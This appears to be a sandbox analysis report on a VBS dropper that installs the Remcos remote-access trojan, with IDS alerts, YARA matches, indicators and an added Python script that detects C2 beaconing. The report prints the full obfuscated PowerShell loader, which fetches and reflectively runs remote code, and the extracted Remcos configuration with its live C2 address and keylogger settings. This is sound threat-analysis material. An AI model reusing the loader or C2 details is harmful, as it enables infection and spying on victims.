                  Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", ProcessId: 7808, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", ProcessId: 7808, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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

                  Stealing of Sensitive Information

Source: Registry Key set, Author: Joe Security, Data: Details: B4 3D DD D1 91 B0 DF CC FB 95 F6 2E 53 37 48 40 98 D2 05 4C 75 58 AB 79 F1 76 B7 EE DC 24 90 16 0A D8 D8 04 61 CC 41 2E AB 49 20 6E A3 7F 5E D8 D7 08 E5 34 45 93 AC E7 03 C0 1F EF 25 8A 6D B3 4E 09 88 35 56 DA 3E BA 49 A0 77 E9 E2 4C 1F C3 B6 5A 68 F4 78 72 B9 A7 2B 6B 60 17 2C D7 B9 45 01 31 01 95 E2 79 03 38 AB FD 5A 91 10 74 24 2B 4F 86, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 7048, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-O0U3JA\exepath
Suricata IDS alerts:

Timestamp                        SID      Severity  Classtype                                      Source IP     Src port  Destination IP  Dst port  Protocol
2024-10-02T05:29:27.935861+0200  2020423  1         Exploit Kit Activity Detected                  45.90.89.123  80        192.168.2.10    49707     TCP
2024-10-02T05:29:27.935861+0200  2020425  1         Exploit Kit Activity Detected                  45.90.89.123  80        192.168.2.10    49707     TCP
2024-10-02T05:29:12.457573+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.10  60901     45.90.89.98     8243      TCP
2024-10-02T05:29:50.329695+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.10  49708     45.90.89.98     8243      TCP
2024-10-02T05:30:12.684380+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.10  49713     45.90.89.98     8243      TCP
2024-10-02T05:30:35.061345+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.10  60898     45.90.89.98     8243      TCP
2024-10-02T05:30:57.500976+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.10  60899     45.90.89.98     8243      TCP
2024-10-02T05:31:19.894305+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.10  60900     45.90.89.98     8243      TCP
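The six C2 alerts (SID 2036594, 192.168.2.10 -> 45.90.89.98:8243) fire about every 22 seconds, which is the regularity a beaconing check catches even when no JA3 or payload signature exists for the family. The script below is an added example, not part of the report: it groups alerts by the non-private endpoint, measures the interval between successive connections, and flags endpoints whose intervals cluster tightly around the median. The alert rows are transcribed from the Suricata table above into a constructed tuple list; the thresholds (at least four connections, median absolute deviation at most 10% of the median interval) are the example's own assumptions.

```python
"""Beaconing check over the Suricata alert rows in this report (added example).

Groups alerts by the non-private endpoint, measures the time between successive
connections, and flags endpoints whose intervals cluster tightly around the
median. The median absolute deviation keeps one slow first connection from
hiding an otherwise regular cadence.
"""
import ipaddress
from datetime import datetime
from statistics import median

# Rows transcribed from the report's Suricata table (constructed input):
# (timestamp, sid, src_ip, src_port, dst_ip, dst_port)
ALERTS = [
    ("2024-10-02T05:29:27.935861+0200", 2020423, "45.90.89.123", 80, "192.168.2.10", 49707),
    ("2024-10-02T05:29:27.935861+0200", 2020425, "45.90.89.123", 80, "192.168.2.10", 49707),
    ("2024-10-02T05:29:12.457573+0200", 2036594, "192.168.2.10", 60901, "45.90.89.98", 8243),
    ("2024-10-02T05:29:50.329695+0200", 2036594, "192.168.2.10", 49708, "45.90.89.98", 8243),
    ("2024-10-02T05:30:12.684380+0200", 2036594, "192.168.2.10", 49713, "45.90.89.98", 8243),
    ("2024-10-02T05:30:35.061345+0200", 2036594, "192.168.2.10", 60898, "45.90.89.98", 8243),
    ("2024-10-02T05:30:57.500976+0200", 2036594, "192.168.2.10", 60899, "45.90.89.98", 8243),
    ("2024-10-02T05:31:19.894305+0200", 2036594, "192.168.2.10", 60900, "45.90.89.98", 8243),
]

MIN_CONNECTIONS = 4   # assumption: fewer samples give no usable cadence
MAX_REL_MAD = 0.10    # assumption: MAD/median at or below 10% counts as periodic


def parse_ts(ts: str) -> datetime:
    """Suricata timestamps carry a '+0200'-style offset; strptime's %z accepts it."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def remote_endpoint(src_ip, src_port, dst_ip, dst_port):
    """(ip, port) of the non-private side, whichever direction the alert fired on."""
    if ipaddress.ip_address(src_ip).is_private:
        return dst_ip, dst_port
    return src_ip, src_port


def beacon_candidates(alerts):
    """Map remote (ip, port) -> {count, median_interval, rel_mad, periodic}."""
    by_remote = {}
    for ts, _sid, sip, sp, dip, dp in alerts:
        by_remote.setdefault(remote_endpoint(sip, sp, dip, dp), []).append(parse_ts(ts))
    result = {}
    for remote, times in by_remote.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        stats = {"count": len(times), "median_interval": None, "rel_mad": None,
                 "periodic": False}
        if len(times) >= MIN_CONNECTIONS:
            med = median(gaps)
            mad = median([abs(g - med) for g in gaps])
            rel = mad / med if med > 0 else float("inf")
            stats.update(median_interval=med, rel_mad=rel, periodic=rel <= MAX_REL_MAD)
        result[remote] = stats
    return result


if __name__ == "__main__":
    for (ip, port), s in beacon_candidates(ALERTS).items():
        flag = "PERIODIC" if s["periodic"] else "-"
        print(f"{ip}:{port:<5} n={s['count']} median={s['median_interval']} {flag}")
```

On these rows the 45.90.89.98:8243 endpoint comes out with a median interval of about 22.4 s and a relative deviation well under 1%, while the two same-timestamp alerts from 45.90.89.123:80 fall below the sample threshold and stay unflagged. In production the same statistic belongs on flow or connection logs rather than on alerts, so that it does not depend on a signature having fired in the first place.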


                  AV Detection

Source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "45.90.89.98:8243:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt, Virustotal: Detection: 10%
Source: http://45.90.89.123/2117/RMCCF.txt, Virustotal: Detection: 14%
Source: http://45.90.89.123, Virustotal: Detection: 13%
Source: 45.90.89.98, Virustotal: Detection: 12%
Source: 5fKvwnCAeC.vbs, Virustotal: Detection: 9%
Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 11_2_004338C8
Source: powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_4395ad51-c

                  Exploits

Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR

                  Privilege Escalation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_00407538 _wcslen,CoGetObject, 11_2_00407538
Source: unknown, HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 0000000A.00000002.1404922826.0000026F3E840000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_0040928E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_0041C322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_0040C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_004096A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_00408847
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_00407877 FindFirstFileW,FindNextFileW, 11_2_00407877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0044E8F9 FindFirstFileExA, 11_2_0044E8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_0040BB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_00419B86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_0040BD72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 11_2_00407CD2

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                  Networking

                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49708 -> 45.90.89.98:8243
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:60898 -> 45.90.89.98:8243
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:60899 -> 45.90.89.98:8243
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49713 -> 45.90.89.98:8243
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:60900 -> 45.90.89.98:8243
                  Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 45.90.89.123:80 -> 192.168.2.10:49707
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 45.90.89.123:80 -> 192.168.2.10:49707
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:60901 -> 45.90.89.98:8243
                  Source: Malware configuration extractor | URLs: 45.90.89.98
                  Source: global traffic | TCP traffic: 192.168.2.10:49708 -> 45.90.89.98:8243
                  Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 Host: ia600100.us.archive.org Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /2117/RMCCF.txt HTTP/1.1 Host: 45.90.89.123 Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 45.90.89.98
                  Source: Joe Sandbox View | IP Address: 207.241.227.240
                  Source: Joe Sandbox View | ASN Name: CMCSUS
                  Source: Joe Sandbox View | ASN Name: CMCSUS
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown | TCP traffic detected without corresponding DNS query: 45.90.89.123 (this identical detection is listed 50 times in the report)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00426D42 recv
                  Source: global traffic | DNS traffic detected: DNS query: ia600100.us.archive.org
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2DC4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.90.89.123
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2DC4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.90.89.123/2117/RMCCF.txt
                  Source: RegAsm.exe | String found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EF0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ia600100.us.archive.org
                  Source: powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000008.00000002.1454522210.000001EB02CCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2D821000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000008.00000002.1454522210.000001EB02CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1454522210.000001EB02C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2D821000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2E87A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EE8A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.arX
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EE8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2DA42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt9uO;FIibase64Content
                  Source: powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
                  Source: powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
                  Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknown | HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.10:49706 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                  Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041CA73 SystemParametersInfoW

                  System Summary

                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 8120, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
